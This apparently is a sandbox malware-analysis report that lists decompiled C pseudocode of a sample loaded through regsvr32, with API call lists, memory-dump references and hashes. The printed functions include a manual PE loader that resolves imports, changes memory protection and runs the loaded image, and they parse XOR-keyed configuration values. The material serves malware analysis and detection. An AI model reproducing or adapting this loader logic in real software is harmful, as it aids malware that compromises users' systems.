                                                  				_t18 = E005E1A0F( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x5e414c - 0x63698bc4 &  !( *0x5e414c - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x5e414c - 0x63698bc4 &  !( *0x5e414c - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                  				if(_t18 != 0) {
                                                  					_t29 = 8;
                                                  					goto L8;
                                                  				} else {
                                                  					_t40 = _v8;
                                                  					_t29 = E005E125B(_t33, _t40, _t41);
                                                  					if(_t29 == 0) {
                                                  						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                  						_t29 = E005E1745(_t40, _t44);
                                                  						if(_t29 == 0) {
                                                  							_t26 = E005E1179(_t44, _t40); // executed
                                                  							_t29 = _t26;
                                                  							if(_t29 == 0) {
                                                  								_push(_t26);
                                                  								_push(1);
                                                  								_push(_t40);
                                                  								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                  									_t29 = GetLastError();
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					_t42 = _v12;
                                                  					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                  					E005E1DFC(_t42);
                                                  					L8:
                                                  					return _t29;
                                                  				}
                                                  			}













                                                  0x005e1e19
                                                  0x005e1e1b
                                                  0x005e1e37
                                                  0x005e1e48
                                                  0x005e1e4f
                                                  0x005e1ead
                                                  0x00000000
                                                  0x005e1e51
                                                  0x005e1e51
                                                  0x005e1e5b
                                                  0x005e1e5f
                                                  0x005e1e64
                                                  0x005e1e6c
                                                  0x005e1e70
                                                  0x005e1e75
                                                  0x005e1e7a
                                                  0x005e1e7e
                                                  0x005e1e83
                                                  0x005e1e84
                                                  0x005e1e88
                                                  0x005e1e8d
                                                  0x005e1e95
                                                  0x005e1e95
                                                  0x005e1e8d
                                                  0x005e1e7e
                                                  0x005e1e70
                                                  0x005e1e97
                                                  0x005e1ea0
                                                  0x005e1ea4
                                                  0x005e1eae
                                                  0x005e1eb4
                                                  0x005e1eb4

                                                  APIs
                                                    • Part of subcall function 005E1A0F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,005E1E4D,?,?,?,?,?,00000002,?,005E1401), ref: 005E1A33
                                                    • Part of subcall function 005E1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 005E1A55
                                                    • Part of subcall function 005E1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 005E1A6B
                                                    • Part of subcall function 005E1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 005E1A81
                                                    • Part of subcall function 005E1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 005E1A97
                                                    • Part of subcall function 005E1A0F: GetProcAddress.KERNEL32(00000000,?), ref: 005E1AAD
                                                    • Part of subcall function 005E125B: memcpy.NTDLL(?,?,?), ref: 005E1288
                                                    • Part of subcall function 005E125B: memcpy.NTDLL(?,?,?), ref: 005E12BB
                                                    • Part of subcall function 005E1745: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 005E177D
                                                    • Part of subcall function 005E1179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 005E11B2
                                                    • Part of subcall function 005E1179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 005E1227
                                                    • Part of subcall function 005E1179: GetLastError.KERNEL32 ref: 005E122D
                                                  • GetLastError.KERNEL32(?,005E1401), ref: 005E1E8F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                  • String ID:
                                                  • API String ID: 2673762927-0
                                                  • Opcode ID: 711ecc7af25614652826946479db43021428a5a1629b91bd4782ad5d51ff7fa6
                                                  • Instruction ID: a22415403f4e36ffc75b1a33e9a8d4210fbc4c949980e412e355a40fdd83efea
                                                  • Opcode Fuzzy Hash: 711ecc7af25614652826946479db43021428a5a1629b91bd4782ad5d51ff7fa6
                                                  • Instruction Fuzzy Hash: E5115E36600B46ABCB249BA6CC84DAB7FBCBFC83047000055FD8297501E6B0ED0587A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E00C821CD(void* __ecx, signed char* _a4) {
                                                  				void* _v8;
                                                  				void* _t8;
                                                  				signed short _t11;
                                                  				signed int _t12;
                                                  				signed int _t14;
                                                  				intOrPtr _t15;
                                                  				void* _t19;
                                                  				signed short* _t22;
                                                  				void* _t24;
                                                  				intOrPtr* _t27;
                                                  
                                                  				_t24 = 0;
                                                  				_push(0);
                                                  				_t19 = 1;
                                                  				_t27 = 0xc8d330;
                                                  				E00C884D5();
                                                  				while(1) {
                                                  					_t8 = E00C812D4(_a4,  &_v8); // executed
                                                  					if(_t8 == 0) {
                                                  						break;
                                                  					}
                                                  					_push(_v8);
                                                  					_t14 = 0xd;
                                                  					_t15 = E00C8809F(_t14);
                                                  					if(_t15 == 0) {
                                                  						HeapFree( *0xc8d238, 0, _v8);
                                                  						break;
                                                  					} else {
                                                  						 *_t27 = _t15;
                                                  						_t27 = _t27 + 4;
                                                  						_t24 = _t24 + 1;
                                                  						if(_t24 < 3) {
                                                  							continue;
                                                  						} else {
                                                  						}
                                                  					}
                                                  					L7:
                                                  					_push(1);
                                                  					E00C884D5();
                                                  					if(_t19 != 0) {
                                                  						_t22 =  *0xc8d338; // 0x10a9b70
                                                  						_t11 =  *_t22 & 0x0000ffff;
                                                  						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                  							_t12 = _t11 & 0x0000ffff;
                                                  						} else {
                                                  							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                  						}
                                                  						 *_t22 = _t12;
                                                  					}
                                                  					return _t19;
                                                  				}
                                                  				_t19 = 0;
                                                  				goto L7;
                                                  			}
                                                  0x00c821d5
                                                  0x00c821d9
                                                  0x00c821da
                                                  0x00c821db
                                                  0x00c821e0
                                                  0x00c821e5
                                                  0x00c821ec
                                                  0x00c821f3
                                                  0x00000000
                                                  0x00000000
                                                  0x00c821f5
                                                  0x00c821fa
                                                  0x00c821fb
                                                  0x00c82202
                                                  0x00c8221c
                                                  0x00000000
                                                  0x00c82204
                                                  0x00c82204
                                                  0x00c82206
                                                  0x00c82209
                                                  0x00c8220d
                                                  0x00000000
                                                  0x00000000
                                                  0x00c8220f
                                                  0x00c8220d
                                                  0x00c82224
                                                  0x00c82224
                                                  0x00c82226
                                                  0x00c8222d
                                                  0x00c8222f
                                                  0x00c82235
                                                  0x00c8223c
                                                  0x00c8224c
                                                  0x00c82244
                                                  0x00c82247
                                                  0x00c82247
                                                  0x00c8224f
                                                  0x00c8224f
                                                  0x00c82258
                                                  0x00c82258
                                                  0x00c82222
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00C884D5: GetProcAddress.KERNEL32(36776F57,00C821E5), ref: 00C884F0
                                                    • Part of subcall function 00C812D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00C812FF
                                                    • Part of subcall function 00C812D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00C81321
                                                    • Part of subcall function 00C812D4: memset.NTDLL ref: 00C8133B
                                                    • Part of subcall function 00C812D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00C81379
                                                    • Part of subcall function 00C812D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00C8138D
                                                    • Part of subcall function 00C812D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00C813A4
                                                    • Part of subcall function 00C812D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00C813B0
                                                    • Part of subcall function 00C812D4: lstrcat.KERNEL32(?,642E2A5C), ref: 00C813F1
                                                    • Part of subcall function 00C812D4: FindFirstFileA.KERNELBASE(?,?), ref: 00C81407
                                                    • Part of subcall function 00C8809F: lstrlen.KERNEL32(?,00000000,00C8D330,00000001,00C82200,00C8D00C,00C8D00C,00000000,00000005,00000000,00000000,?,?,?,00C896C1,00C823E9), ref: 00C880A8
                                                    • Part of subcall function 00C8809F: mbstowcs.NTDLL ref: 00C880CF
                                                    • Part of subcall function 00C8809F: memset.NTDLL ref: 00C880E1
                                                  • HeapFree.KERNEL32(00000000,00C8D00C,00C8D00C,00C8D00C,00000000,00000005,00000000,00000000,?,?,?,00C896C1,00C823E9,00C8D00C,?,00C823E9), ref: 00C8221C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: a736b4211db825ee01340443a941b28f147ea1b51ac21fd8dc6fce354182ba4c
                                                  • Instruction ID: 12adb11d0418270b408d67d609b2809715a16d6871d4ed175a98cf8007cc8562
                                                  • Opcode Fuzzy Hash: a736b4211db825ee01340443a941b28f147ea1b51ac21fd8dc6fce354182ba4c
                                                  • Instruction Fuzzy Hash: 36012876200204AAE7007FE6DC89F6A72A9EB8537CF500036BD45C70A0D6759D42A32D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00C81262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                  				signed short _t18;
                                                  				void* _t24;
                                                  				signed int _t26;
                                                  				signed short _t27;
                                                  
                                                  				if(_a4 != 0) {
                                                  					_t18 = E00C89318(_a4, _a8, _a12, __esi); // executed
                                                  					_t27 = _t18;
                                                  				} else {
                                                  					_t27 = E00C86BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                  					if(_t27 == 0) {
                                                  						_t26 = _a8 >> 1;
                                                  						if(_t26 == 0) {
                                                  							_t27 = 2;
                                                  							HeapFree( *0xc8d238, 0, _a12);
                                                  						} else {
                                                  							_t24 = _a12;
                                                  							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                                                  							 *__esi = _t24;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t27;
                                                  			}
                                                  0x00c8126a
                                                  0x00c812bf
                                                  0x00c812c4
                                                  0x00c8126c
                                                  0x00c81286
                                                  0x00c8128a
                                                  0x00c8128f
                                                  0x00c81291
                                                  0x00c812a1
                                                  0x00c812ad
                                                  0x00c81293
                                                  0x00c81293
                                                  0x00c81296
                                                  0x00c8129b
                                                  0x00c8129b
                                                  0x00c81291
                                                  0x00c8128a
                                                  0x00c812ca

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,00C8743A,?,004F0053,010A9388,00000000,?), ref: 00C812AD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: cee3e6c210214bb29fef6aaa8443de072bd5c2cf2d349aabfbfb3b2ea3cd72c9
                                                  • Instruction ID: f3d7c3cfe4c95de4f80dcf0c1327970de640bcf382b736e736d52f4a81776072
                                                  • Opcode Fuzzy Hash: cee3e6c210214bb29fef6aaa8443de072bd5c2cf2d349aabfbfb3b2ea3cd72c9
                                                  • Instruction Fuzzy Hash: 57011D32100249FBCB12AF44DC01FAE3BBAEB94364F198429FE15DA160D731D921DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E00C82436(intOrPtr* __edi) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _t15;
                                                  				intOrPtr* _t21;
                                                  
                                                  				_t21 = __edi;
                                                  				_push( &_v12);
                                                  				_push(__edi);
                                                  				_v8 = 0x1d4c0;
                                                  				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                  				while(1) {
                                                  					_v16 = _t15;
                                                  					Sleep(0x1f4); // executed
                                                  					if(_v12 == 4) {
                                                  						break;
                                                  					}
                                                  					if(_v8 == 0) {
                                                  						L4:
                                                  						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                  						continue;
                                                  					} else {
                                                  						if(_v8 <= 0x1f4) {
                                                  							_v16 = 0x80004004;
                                                  						} else {
                                                  							_v8 = _v8 - 0x1f4;
                                                  							goto L4;
                                                  						}
                                                  					}
                                                  					L8:
                                                  					return _v16;
                                                  				}
                                                  				goto L8;
                                                  			}
                                                  0x00c82436
                                                  0x00c82443
                                                  0x00c82444
                                                  0x00c82445
                                                  0x00c8244c
                                                  0x00c8247a
                                                  0x00c8247b
                                                  0x00c8247e
                                                  0x00c82484
                                                  0x00000000
                                                  0x00000000
                                                  0x00c82463
                                                  0x00c8246d
                                                  0x00c82474
                                                  0x00000000
                                                  0x00c82465
                                                  0x00c82468
                                                  0x00c82488
                                                  0x00c8246a
                                                  0x00c8246a
                                                  0x00000000
                                                  0x00c8246a
                                                  0x00c82468
                                                  0x00c8248f
                                                  0x00c82495
                                                  0x00c82495
                                                  0x00000000

                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 00C8247E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 0d0e6d9ef6079d979e9c2bf340dfe69194b6345d319008b449d3a8d0dbbfb5c4
                                                  • Instruction ID: 36db390f8faed6e401bb0ac627ee301019232023c9de7e94027918516874e4a3
                                                  • Opcode Fuzzy Hash: 0d0e6d9ef6079d979e9c2bf340dfe69194b6345d319008b449d3a8d0dbbfb5c4
                                                  • Instruction Fuzzy Hash: 0FF04F71C01219EFDB00EB94C58CAEDB7B8EF45308F1080AAE51263141D3B45B44CF75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00C8A66E(void* __edx, void* __edi, void* _a4) {
                                                  				int _t7;
                                                  				int _t13;
                                                  
                                                  				_t7 = E00C87323(__edx, __edi, _a4,  &_a4); // executed
                                                  				_t13 = _t7;
                                                  				if(_t13 != 0) {
                                                  					memcpy(__edi, _a4, _t13);
                                                  					 *((char*)(__edi + _t13)) = 0;
                                                  					E00C89039(_a4);
                                                  				}
                                                  				return _t13;
                                                  			}
                                                  0x00c8a67a
                                                  0x00c8a67f
                                                  0x00c8a683
                                                  0x00c8a68a
                                                  0x00c8a695
                                                  0x00c8a699
                                                  0x00c8a699
                                                  0x00c8a6a2

                                                  APIs
                                                    • Part of subcall function 00C87323: memcpy.NTDLL(00000000,00000090,00000002,00000002,00C8685F,00000008,00C8685F,00C8685F,?,00C8858C,00C8685F), ref: 00C87359
                                                    • Part of subcall function 00C87323: memset.NTDLL ref: 00C873CF
                                                    • Part of subcall function 00C87323: memset.NTDLL ref: 00C873E3
                                                  • memcpy.NTDLL(00000002,00C8685F,00000000,00000002,00C8685F,00C8685F,00C8685F,?,00C8858C,00C8685F,?,00C8685F,00000002,?,?,00C82417), ref: 00C8A68A
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset$FreeHeap
                                                  • String ID:
                                                  • API String ID: 3053036209-0
                                                  • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction ID: 1a02da90c533b05735abf786cc430ec60f2f91bb0ed031fc69de8709825d1300
                                                  • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction Fuzzy Hash: 1BE08676404228B6C7123A94DC01EFF7F5DCF45795F044015FE084A101E631DA10B3EA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 92%
                                                  			E00C84094(int* __ecx) {
                                                  				int _v8;
                                                  				void* _v12;
                                                  				void* __esi;
                                                  				signed int _t20;
                                                  				signed int _t25;
                                                  				char* _t31;
                                                  				char* _t32;
                                                  				char* _t33;
                                                  				char* _t34;
                                                  				char* _t35;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t38;
                                                  				intOrPtr _t39;
                                                  				void* _t41;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				signed int _t46;
                                                  				intOrPtr _t49;
                                                  				signed int _t50;
                                                  				signed int _t55;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  				signed int _t60;
                                                  				signed int _t64;
                                                  				signed int _t68;
                                                  				signed int _t72;
                                                  				signed int _t76;
                                                  				signed int _t80;
                                                  				void* _t85;
                                                  				intOrPtr _t102;
                                                  
                                                  				_t86 = __ecx;
                                                  				_t20 =  *0xc8d278; // 0x63699bc3
                                                  				if(E00C88748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                                                  					 *0xc8d2d4 = _v12;
                                                  				}
                                                  				_t25 =  *0xc8d278; // 0x63699bc3
                                                  				if(E00C88748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                                                  					_push(2);
                                                  					_pop(0);
                                                  					goto L60;
                                                  				} else {
                                                  					_t85 = _v12;
                                                  					if(_t85 == 0) {
                                                  						_t31 = 0;
                                                  					} else {
                                                  						_t80 =  *0xc8d278; // 0x63699bc3
                                                  						_t31 = E00C83F7C(_t86, _t85, _t80 ^ 0x724e87bc);
                                                  					}
                                                  					if(_t31 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                  							 *0xc8d240 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t32 = 0;
                                                  					} else {
                                                  						_t76 =  *0xc8d278; // 0x63699bc3
                                                  						_t32 = E00C83F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
                                                  					}
                                                  					if(_t32 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                  							 *0xc8d244 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t33 = 0;
                                                  					} else {
                                                  						_t72 =  *0xc8d278; // 0x63699bc3
                                                  						_t33 = E00C83F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
                                                  					}
                                                  					if(_t33 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                  							 *0xc8d248 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t34 = 0;
                                                  					} else {
                                                  						_t68 =  *0xc8d278; // 0x63699bc3
                                                  						_t34 = E00C83F7C(_t86, _t85, _t68 ^ 0x0602e249);
                                                  					}
                                                  					if(_t34 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                                                  							 *0xc8d004 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t35 = 0;
                                                  					} else {
                                                  						_t64 =  *0xc8d278; // 0x63699bc3
                                                  						_t35 = E00C83F7C(_t86, _t85, _t64 ^ 0x3603764c);
                                                  					}
                                                  					if(_t35 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                                                  							 *0xc8d02c = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t36 = 0;
                                                  					} else {
                                                  						_t60 =  *0xc8d278; // 0x63699bc3
                                                  						_t36 = E00C83F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
                                                  					}
                                                  					if(_t36 != 0) {
                                                  						_push(_t36);
                                                  						_t57 = 0x10;
                                                  						_t58 = E00C86ED2(_t57);
                                                  						if(_t58 != 0) {
                                                  							_push(_t58);
                                                  							E00C8A5D6();
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t37 = 0;
                                                  					} else {
                                                  						_t55 =  *0xc8d278; // 0x63699bc3
                                                  						_t37 = E00C83F7C(_t86, _t85, _t55 ^ 0xb30fc035);
                                                  					}
                                                  					if(_t37 != 0 && E00C86ED2(0, _t37) != 0) {
                                                  						_t102 =  *0xc8d32c; // 0x10a95b0
                                                  						E00C875E9(_t102 + 4, _t53);
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t38 = 0;
                                                  					} else {
                                                  						_t50 =  *0xc8d278; // 0x63699bc3
                                                  						_t38 = E00C83F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
                                                  					}
                                                  					if(_t38 == 0) {
                                                  						L51:
                                                  						_t39 =  *0xc8d27c; // 0x41a5a8
                                                  						_t18 = _t39 + 0xc8e252; // 0x616d692f
                                                  						 *0xc8d2d0 = _t18;
                                                  						goto L52;
                                                  					} else {
                                                  						_t49 = E00C86ED2(0, _t38);
                                                  						 *0xc8d2d0 = _t49;
                                                  						if(_t49 != 0) {
                                                  							L52:
                                                  							if(_t85 == 0) {
                                                  								_t41 = 0;
                                                  							} else {
                                                  								_t46 =  *0xc8d278; // 0x63699bc3
                                                  								_t41 = E00C83F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
                                                  							}
                                                  							if(_t41 == 0) {
                                                  								_t42 =  *0xc8d27c; // 0x41a5a8
                                                  								_t19 = _t42 + 0xc8e791; // 0x6976612e
                                                  								_t43 = _t19;
                                                  							} else {
                                                  								_t43 = E00C86ED2(0, _t41);
                                                  							}
                                                  							 *0xc8d340 = _t43;
                                                  							HeapFree( *0xc8d238, 0, _t85);
                                                  							L60:
                                                  							return 0;
                                                  						}
                                                  						goto L51;
                                                  					}
                                                  				}
                                                  			}
                                                  0x00c84094
                                                  0x00c84097
                                                  0x00c840b7
                                                  0x00c840c5
                                                  0x00c840c5
                                                  0x00c840ca
                                                  0x00c840e4
                                                  0x00c842e2
                                                  0x00c842e4
                                                  0x00000000
                                                  0x00c840ea
                                                  0x00c840ea
                                                  0x00c840f1
                                                  0x00c84107
                                                  0x00c840f3
                                                  0x00c840f3
                                                  0x00c84100
                                                  0x00c84100
                                                  0x00c84111
                                                  0x00c84113
                                                  0x00c8411d
                                                  0x00c84122
                                                  0x00c84122
                                                  0x00c8411d
                                                  0x00c84129
                                                  0x00c8413f
                                                  0x00c8412b
                                                  0x00c8412b
                                                  0x00c84138
                                                  0x00c84138
                                                  0x00c84143
                                                  0x00c84145
                                                  0x00c8414f
                                                  0x00c84154
                                                  0x00c84154
                                                  0x00c8414f
                                                  0x00c8415b
                                                  0x00c84171
                                                  0x00c8415d
                                                  0x00c8415d
                                                  0x00c8416a
                                                  0x00c8416a
                                                  0x00c84175
                                                  0x00c84177
                                                  0x00c84181
                                                  0x00c84186
                                                  0x00c84186
                                                  0x00c84181
                                                  0x00c8418d
                                                  0x00c841a3
                                                  0x00c8418f
                                                  0x00c8418f
                                                  0x00c8419c
                                                  0x00c8419c
                                                  0x00c841a7
                                                  0x00c841a9
                                                  0x00c841b3
                                                  0x00c841b8
                                                  0x00c841b8
                                                  0x00c841b3
                                                  0x00c841bf
                                                  0x00c841d5
                                                  0x00c841c1
                                                  0x00c841c1
                                                  0x00c841ce
                                                  0x00c841ce
                                                  0x00c841d9
                                                  0x00c841db
                                                  0x00c841e5
                                                  0x00c841ea
                                                  0x00c841ea
                                                  0x00c841e5
                                                  0x00c841f1
                                                  0x00c84207
                                                  0x00c841f3
                                                  0x00c841f3
                                                  0x00c84200
                                                  0x00c84200
                                                  0x00c8420b
                                                  0x00c8420d
                                                  0x00c84210
                                                  0x00c84211
                                                  0x00c84218
                                                  0x00c8421a
                                                  0x00c8421b
                                                  0x00c8421b
                                                  0x00c84218
                                                  0x00c84222
                                                  0x00c84238
                                                  0x00c84224
                                                  0x00c84224
                                                  0x00c84231
                                                  0x00c84231
                                                  0x00c8423c
                                                  0x00c8424a
                                                  0x00c84254
                                                  0x00c84254
                                                  0x00c8425b
                                                  0x00c84271
                                                  0x00c8425d
                                                  0x00c8425d
                                                  0x00c8426a
                                                  0x00c8426a
                                                  0x00c84275
                                                  0x00c84288
                                                  0x00c84288
                                                  0x00c8428d
                                                  0x00c84293
                                                  0x00000000
                                                  0x00c84277
                                                  0x00c8427a
                                                  0x00c84281
                                                  0x00c84286
                                                  0x00c84298
                                                  0x00c8429a
                                                  0x00c842b0
                                                  0x00c8429c
                                                  0x00c8429c
                                                  0x00c842a9
                                                  0x00c842a9
                                                  0x00c842b4
                                                  0x00c842c0
                                                  0x00c842c5
                                                  0x00c842c5
                                                  0x00c842b6
                                                  0x00c842b9
                                                  0x00c842b9
                                                  0x00c842d3
                                                  0x00c842d8
                                                  0x00c842e5
                                                  0x00c842e9
                                                  0x00c842e9
                                                  0x00000000
                                                  0x00c84286
                                                  0x00c84275

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C84119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C8414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C8417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C841AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C841E1
                                                  • HeapFree.KERNEL32(00000000,00C823DE,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C842D8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 9023bf63f34e771c626b5322fdceb4c6a7e53c88f755fe05e8a6cefbf2426461
                                                  • Instruction ID: d22fbcf1a6510846ba815983c56fc7d2954f5a656472f9f169d01a16546ca3d5
